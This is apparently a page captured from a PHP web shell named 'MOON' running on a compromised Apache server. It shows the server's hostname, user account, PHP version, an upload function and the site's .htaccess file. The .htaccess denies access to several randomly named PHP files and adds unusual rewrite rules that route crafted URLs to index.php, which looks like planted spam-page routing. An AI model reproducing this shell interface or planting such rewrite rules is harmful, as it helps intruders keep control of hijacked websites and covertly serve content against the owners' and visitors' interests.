MOON
Server: Apache
System: Linux srvsg2.lunchactually.com 3.10.0-957.27.2.el7.x86_64 #1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64
User: matchmakinginsti (1004)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: //proc/self/cwd/.htaccess
<FilesMatch "xmlrpc\.php|bcobire\.php|bywuojct\.php|2pc5o\.php|s15tk\.php">
  Order allow,deny
  Deny from all
</FilesMatch>

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(\d+)b(\d+)[-/].*[-/]h(\d+)-.*$ index\.php?id=$1-$2-$3&%{QUERY_STRING} [L]
RewriteRule ^(\d+)b(\d+)[-/]h(\d+)[-/].*$ index\.php?id=$1-$2-$3&%{QUERY_STRING} [L]
RewriteRule ^h(\d+)[-/].*[-/](\d+)b(\d+)[-/].*$ index\.php?id=$2-$3-$1&%{QUERY_STRING} [L]
RewriteRule ^h(\d+)[-/](\d+)b(\d+)[-/].*$ index\.php?id=$2-$3-$1&%{QUERY_STRING} [L]
RewriteRule ^.*[-/]h(\d+)[-/](\d+)b(\d+)[-/].*$ index\.php?id=$2-$3-$1&%{QUERY_STRING} [L]
RewriteRule ^.*[-/]h(\d+)[-/].*[-/](\d+)b(\d+)[-/].*$ index\.php?id=$2-$3-$1&%{QUERY_STRING} [L]
RewriteRule ^.*[-/](\d+)b(\d+)[-/].*[-/]h(\d+)[-/].*$ index\.php?id=$1-$2-$3&%{QUERY_STRING} [L]
RewriteRule ^.*[-/](\d+)b(\d+)[-/]h(\d+)[-/].*$ index\.php?id=$1-$2-$3&%{QUERY_STRING} [L]

RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress